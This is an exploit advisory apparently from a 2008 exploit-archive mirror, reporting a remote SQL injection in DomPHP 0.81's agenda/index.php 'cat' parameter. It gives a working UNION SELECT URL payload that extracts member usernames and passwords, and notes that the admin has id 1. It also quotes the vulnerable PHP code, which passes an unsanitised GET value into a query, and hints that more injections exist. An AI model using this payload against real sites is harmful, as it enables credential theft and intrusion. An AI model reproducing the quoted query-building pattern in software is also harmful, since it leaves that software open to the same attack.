[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability
# Published : 2008-01-11
# Author : MhZ91
# Previous Title : DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit
# Next Title : vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities
--==+================================================================================+==--
--==+ DomPHP v0.81 Remote Sql Injection +==--
--==+================================================================================+==--
Author: MhZ91
Title: DomPHP v0.81 Remote Sql Injection
Download: http://www.domphp.com/download/cat.php?idcat=1
Bug: Remote Sql Injection
Info: DomPHP est un outil de publication enti?¡§rement modulable et surtout compl?¡§tement personnalisable ! Id??al pour les experts mais aussi pour les novices d??sireux de pr??senter un site de qualit??, vous allez cr??er votre portail ou site web en quelques clics !
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
Exploit:
http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*
For get the user and password, u must edit [UserId] whit an id number of members.
The id of admin, is 1 of default.
Vuln code in /agenda/index.php
[...]
if ($_GET['cat']) {
$cat = $_GET['cat'];
if (!$nomcat) {
$requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat";
$result5=mysql_query($requete5, $link);
$recherchenomcat=mysql_fetch_object($result5);
$nomcat = stripslashes($recherchenomcat->nomCategorie);
}
[...]
There is other more sql injection...
[*]----------------------------------------------------------
# www.Syue.com [2008-01-11]